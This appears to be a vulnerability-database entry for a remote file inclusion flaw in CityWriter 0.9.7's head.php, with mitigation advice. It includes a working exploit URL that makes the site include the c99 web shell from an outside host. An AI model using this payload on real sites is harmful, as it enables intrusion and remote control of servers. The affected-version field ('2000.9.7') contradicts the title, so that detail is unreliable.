vendor:
CityWriter
by:
RoMaNcYxHaCkEr
N/A
CVSS
N/A
Remote File Include
Unknown
CWE
Product Name: CityWriter
Affected Version From: 2000.9.7
Affected Version To: 2000.9.7
Patch Exists: Unknown
Related CWE: Unknown
CPE: Unknown
Platforms Tested: Unknown
2007
CityWriter 0.9.7 Remote File Include
The vulnerability exists in the 'head.php' file where the 'include' function is used without proper validation. An attacker can exploit this by providing a remote file URL in the 'path' parameter, which will be included and executed by the application. In this case, the exploit URL is 'Www.RxH.com/citywriter/head.php?path=http://www.no-hack.fr/shells/c99.txt?'
Mitigation:
To mitigate this vulnerability, the application should validate and sanitize user input before using it in the 'include' function. Additionally, the application should use a whitelist approach, allowing only specific files to be included.